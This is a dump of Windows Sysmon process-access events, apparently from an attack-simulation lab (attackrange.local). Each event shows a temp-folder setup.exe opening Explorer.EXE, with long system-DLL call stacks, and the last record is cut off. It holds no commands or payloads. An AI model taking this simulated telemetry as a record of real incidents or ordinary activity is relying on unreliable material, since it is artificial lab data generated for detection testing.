13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015967Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015966Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015965Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015964Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015963Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015962Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015961Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015960Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015959Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015958Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015957Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015956Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015955Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015954Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015953Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015952Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015951Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Te